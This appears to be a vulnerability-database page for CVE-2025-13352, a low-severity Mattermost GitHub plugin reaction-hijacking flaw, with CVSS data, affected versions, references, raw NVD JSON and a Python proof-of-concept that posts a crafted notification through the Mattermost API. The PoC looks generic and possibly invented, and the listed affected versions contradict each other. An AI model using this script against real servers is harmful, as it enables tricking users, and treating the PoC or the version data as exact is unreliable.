CVE-2025-13352

Description

Mattermost versions 10.11.x <= 10.11.6 and Mattermost GitHub plugin versions <=2.4.0 fail to validate plugin bot identity in reaction forwarding which allows attackers to hijack the GitHub reaction feature to make users add reactions to arbitrary GitHub objects via crafted notification posts.

CVSS Details

CVSS Score

3.0

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE

Mattermost < 10.11.6

Mattermost 10.11.x <= 10.11.6

Mattermost GitHub Plugin < 2.4.0

Mattermost GitHub Plugin <= 2.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-13352 PoC - Mattermost GitHub Plugin Reaction Hijacking
# This PoC demonstrates the reaction hijacking vulnerability

import requests
import json

TARGET_URL = "https://vulnerable-mattermost-server.com"
ATTACKER_TOKEN = "attacker_webhook_token"
MALICIOUS_PAYLOAD = {
    "type": "github_notification",
    "action": "reaction",
    "target": {
        "owner": "attacker-controlled-org",
        "repo": "malicious-repo",
        "issue_number": 1
    },
    "reaction_type": "thumbsup"
}

def exploit_reaction_hijacking():
    """
    Exploit steps:
    1. Send malicious notification to target user
    2. User views notification and clicks reaction button
    3. Plugin forwards reaction to GitHub without proper bot identity validation
    4. User's reaction is applied to attacker-controlled GitHub object
    """
    exploit_url = f"{TARGET_URL}/api/v4/posts"
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    response = requests.post(exploit_url, headers=headers, json={
        "channel_id": "target_user_channel",
        "message": "GitHub notification",
        "props": MALICIOUS_PAYLOAD
    })
    return response.status_code == 200

# Note: This PoC is for educational purposes only
# Actual exploitation requires authenticated access to Mattermost instance

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13352
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13352
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13352/
[4] VulDB https://vuldb.com/cve/CVE-2025-13352
[5] https://mattermost.com/security-updates

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13352", "sourceIdentifier": "[email protected]", "published": "2025-12-17T13:15:56.627", "lastModified": "2025-12-29T18:50:47.780", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.11.x <= 10.11.6 and Mattermost GitHub plugin versions <=2.4.0 fail to validate plugin bot identity in reaction forwarding which allows attackers to hijack the GitHub reaction feature to make users add reactions to arbitrary GitHub objects via crafted notification posts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N", "baseScore": 3.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.7", "matchCriteriaId": "EB4AD9AE-B2DB-4D49-87AD-FA5F9CE6A0C8"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}